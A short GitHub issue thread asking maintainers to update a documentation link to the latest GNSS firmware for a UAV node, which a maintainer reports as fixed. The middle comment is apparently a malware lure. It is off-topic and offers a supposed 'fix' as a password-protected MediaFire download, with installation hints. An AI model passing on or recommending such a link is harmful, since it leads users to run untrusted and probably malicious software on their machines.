### ISSUE TITLE
Firmware version is not latest

### ISSUE THREAD

**Issue by olegogogo** [InnopolisAero/inno_uavcan_node_binaries#20]
Please update [here](https://docs.raccoonlab.co/guide/intro/firmware_upload.html#step-1-download-latest-firmware) latest version of GNSS firmware from this [docs](https://docs.raccoonlab.co/guide/gps_mag_baro/dronecan.html#_6-6-software-versions)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by PonomarevDA** [comment]
Thank you. Fixed.
